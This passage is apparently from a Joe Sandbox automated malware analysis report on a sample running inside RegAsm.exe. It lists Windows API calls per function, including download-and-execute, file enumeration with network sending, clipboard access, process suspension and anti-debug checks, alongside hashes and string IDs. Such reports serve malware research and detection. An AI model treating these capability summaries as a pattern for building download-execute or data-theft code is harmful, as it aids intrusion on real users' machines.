                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1771804793-0
                                                                                                                            • Opcode ID: b567b387b19c3842d3e3fd3ce298d840e85eb04b560dfe416f5b5c0f2df3b91c
                                                                                                                            • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                                                                                                                            • Opcode Fuzzy Hash: b567b387b19c3842d3e3fd3ce298d840e85eb04b560dfe416f5b5c0f2df3b91c
                                                                                                                            • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                                                                                                                            APIs
                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                                                                                                                            • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: DownloadExecuteFileShell
                                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                                                                                            • API String ID: 2825088817-3056885514
                                                                                                                            • Opcode ID: e77d134f4a4464a8e6bc599e83fa018431052addc1a6848f67049d108f5c6a30
                                                                                                                            • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                                                                                                                            • Opcode Fuzzy Hash: e77d134f4a4464a8e6bc599e83fa018431052addc1a6848f67049d108f5c6a30
                                                                                                                            • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                                                                                                                            APIs
                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                                                                                                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileFind$FirstNextsend
                                                                                                                            • String ID: XPG$XPG
                                                                                                                            • API String ID: 4113138495-1962359302
                                                                                                                            • Opcode ID: 7e33203509aae693cc89a0e1f496922fc68c0ad59341bfee28e2f25de675e589
                                                                                                                            • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                                                                                                                            • Opcode Fuzzy Hash: 7e33203509aae693cc89a0e1f496922fc68c0ad59341bfee28e2f25de675e589
                                                                                                                            • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                                                                                                                            APIs
                                                                                                                            • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                                                                                                              • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                                                                                                              • Part of subcall function 0041376F: RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004137A6
                                                                                                                              • Part of subcall function 0041376F: RegCloseKey.KERNEL32(?), ref: 004137B1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                            • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                            • API String ID: 4127273184-3576401099
                                                                                                                            • Opcode ID: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
                                                                                                                            • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                                                                                                            • Opcode Fuzzy Hash: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
                                                                                                                            • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                                                                              • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                                                                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                                                                              • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                                                                                                                            • String ID: sJD
                                                                                                                            • API String ID: 1661935332-3536923933
                                                                                                                            • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                                                                                                            • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                                                                                                                            • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                                                                                                            • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                                                                              • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                                                                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                                                                              • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                                                                              • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                                                                                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2829624132-0
                                                                                                                            • Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                                                                                                            • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                                                                                                                            • Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                                                                                                            • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                                                                                                                            APIs
                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3906539128-0
                                                                                                                            • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                            • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                                                                            • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                            • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                                                                            APIs
                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC24
                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3906539128-0
                                                                                                                            • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                                                                                                            • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                                                                                                                            • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                                                                                                            • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                                                                            • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1703294689-0
                                                                                                                            • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                            • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                                                                            • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                            • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,0044328B,?), ref: 004432D6
                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,0044328B,?), ref: 004432DD
                                                                                                                            • ExitProcess.KERNEL32 ref: 004432EF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1703294689-0
                                                                                                                            • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                                                                                                            • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                                                                                                                            • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                                                                                                            • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Clipboard$CloseDataOpen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2058664381-0
                                                                                                                            • Opcode ID: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                                                                                                            • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                                                                                                                            • Opcode Fuzzy Hash: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                                                                                                            • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                                                                                                                            APIs
                                                                                                                            • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00415FFF,00000000), ref: 0041BB14
                                                                                                                            • NtSuspendProcess.NTDLL(00000000), ref: 0041BB21
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041BB2A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CloseHandleOpenSuspend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1999457699-0
                                                                                                                            • Opcode ID: 65307f06ae4da2db5a73601f3478dcd91fa25f5db04ba40a4c100ff3b6d3014e
                                                                                                                            • Instruction ID: bc08a5c74f7a636e8823ed9fed2a710289fdff4cb0149baf3e3f1c1580a6a9c0
                                                                                                                            • Opcode Fuzzy Hash: 65307f06ae4da2db5a73601f3478dcd91fa25f5db04ba40a4c100ff3b6d3014e
                                                                                                                            • Instruction Fuzzy Hash: 96D05E36204231E3C32017AA7C0CE97AD68EFC5AA2705412AF804C26649B20CC01C6E8
                                                                                                                            APIs
                                                                                                                            • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00416024,00000000), ref: 0041BB40
                                                                                                                            • NtResumeProcess.NTDLL(00000000), ref: 0041BB4D
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041BB56
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CloseHandleOpenResume
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3614150671-0
                                                                                                                            • Opcode ID: 2a3aa994b22e7efaa36e689b3453aa0ec17d897c0eb19943e791a895e5fd105b
                                                                                                                            • Instruction ID: 907c56f48a3137ad3e5a70bb4b43f8813844e3fa30c0a1486a2e097c633c30d6
                                                                                                                            • Opcode Fuzzy Hash: 2a3aa994b22e7efaa36e689b3453aa0ec17d897c0eb19943e791a895e5fd105b
                                                                                                                            • Instruction Fuzzy Hash: B8D05E36104121E3C220176A7C0CD97AE69EBC5AA2705412AF904C32619B20CC01C6F4
                                                                                                                            APIs
                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434C6B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FeaturePresentProcessor
                                                                                                                            • String ID: MZ@
                                                                                                                            • API String ID: 2325560087-2978689999
                                                                                                                            • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                                                                                                            • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
                                                                                                                            • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                                                                                                            • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: .
                                                                                                                            • API String ID: 0-248832578
                                                                                                                            • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                            • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                                                                                            • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                            • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: .
                                                                                                                            • API String ID: 0-248832578
                                                                                                                            • Opcode ID: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                                                                                                                            • Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
                                                                                                                            • Opcode Fuzzy Hash: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                                                                                                                            • Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                                                                              • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                                                                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                                                                              • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                                                                            • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                            • String ID: lJD
                                                                                                                            • API String ID: 1084509184-3316369744
                                                                                                                            • Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                                                                                                            • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                                                                                                                            • Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                                                                                                            • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                                                                              • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                                                                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                                                                              • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                                                                            • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                            • String ID: lJD
                                                                                                                            • API String ID: 1084509184-3316369744
                                                                                                                            • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                                                                                                            • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                                                                                                                            • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                                                                                                            • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                                                                                                                            APIs
                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoLocale
                                                                                                                            • String ID: GetLocaleInfoEx
                                                                                                                            • API String ID: 2299586839-2904428671
                                                                                                                            • Opcode ID: eeff4f7349616e56738bbc7b8787175557d4d7270555fb13a45f0baf29077f94
